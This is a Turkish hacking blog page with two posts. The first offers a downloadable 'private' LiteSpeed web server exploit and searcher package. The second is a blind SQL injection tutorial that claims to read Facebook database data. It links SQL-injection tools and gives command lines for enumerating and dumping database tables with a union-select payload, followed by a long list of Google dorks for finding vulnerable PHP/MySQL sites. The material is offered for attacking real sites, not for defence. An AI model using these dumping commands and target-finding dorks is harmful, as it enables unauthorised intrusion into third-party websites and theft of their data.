ALL VİDEOS

Megaturks LiteSpeed Web Server Searcher Exploit Private

Posted by Spax Empires on Temmuz 10, 2010
ALL VİDEOS altında yayınlandı. Tagged: , , , , , , . Yorum yapın

Merhaba arkadaslar daha once videolu olarak gosterdigimiz exploitleri sizlere sunuyorum.

ICINDEKILER
# Burtayın Kodladıgı Zamazingo
# Benim kodladıgım searcher
# Keremin kodladıgı sunucutara exploit

Hepsi bir paket icinde alttan indirebilirsiniz.

Video :

Bling SQL Anlatim [ Videolu ]

Posted by Spax Empires on Aralık 4, 2009
ALL VİDEOS, SQL AÇIKLARI altında yayınlandı. Tagged: , , , , , , , , , , . Yorum yapın

Bu Videpda Sizlere Bling SQL i Facebook‘un Databese Bilgilerini Okuyarak Gostermeye Çalistim Arkadaslar . Acık O Kadar Mühim Bir Acik Değil Ama Bling slq i Anlatmak İçin Gayet iyi Bir arac Oldu Benim İçin

Video : http://spaxempires.com/blog/Sakla/facebook.rar

Exploit :

1 : colfinder.py ( MySql inj. Columns Sayar ) : http://www.spaxempires.com/python/col.py

2 : schemafuzz.py ( Table & Column Fuzzer ) : http://www.spaxempires.com/python/sch.py

MS-DOC Komutları :

–dbs = dataları çeker

–schema -D ”data adı” = datadaki tablo cloumn ları alır

–dump -u -D ”data adı” -T ”tablo adı ” -C ”coloumn adı”

ilede tüm verileri çekeriz hemen çekelim bakalım

–dump -u hedef site.com -D ”data” -T ”tablo” -C ”coloumn”

python.exe ./col.py ” “

python.exe ./sch.py -u ” ” –dbs

python.exe ./sch.py -u “Site.com/sayfa.php?id=-1+union+select+0,darkc0de,2,..—” –schema -D “data_base”

python.exe ./sch.py –dump -u ” ” -D “darabase” -T “table” -C “colump”

Bling SQL Dork :

inurl:”id=” & intext:”Warning: mysql_fetch_assoc()

inurl:”id=” & intext:”Warning: mysql_fetch_array()

inurl:”id=” & intext:”Warning: mysql_num_rows()

inurl:”id=” & intext:”Warning: session_start()

inurl:”id=” & intext:”Warning: getimagesize()

inurl:”id=” & intext:”Warning: is_writable()

inurl:”id=” & intext:”Warning: getimagesize()

inurl:”id=” & intext:”Warning: Unknown()

inurl:”id=” & intext:”Warning: session_start()

inurl:”id=” & intext:”Warning: mysql_result()

inurl:”id=” & intext:”Warning: pg_exec()

inurl:”id=” & intext:”Warning: mysql_result()

inurl:”id=” & intext:”Warning: mysql_num_rows()

inurl:”id=” & intext:”Warning: mysql_query()

inurl:”id=” & intext:”Warning: array_merge()

inurl:”id=” & intext:”Warning: preg_match()

inurl:”id=” & intext:”Warning: ilesize()

inurl:”id=” & intext:”Warning: filesize()

inurl:”id=” & intext:”Warning: require()

Not : Dorklar Ve Exploitler İçin Prens Kardesime Tesekkür Ediyorum Anlatimi Ve Exploiti Ona Borcluyum .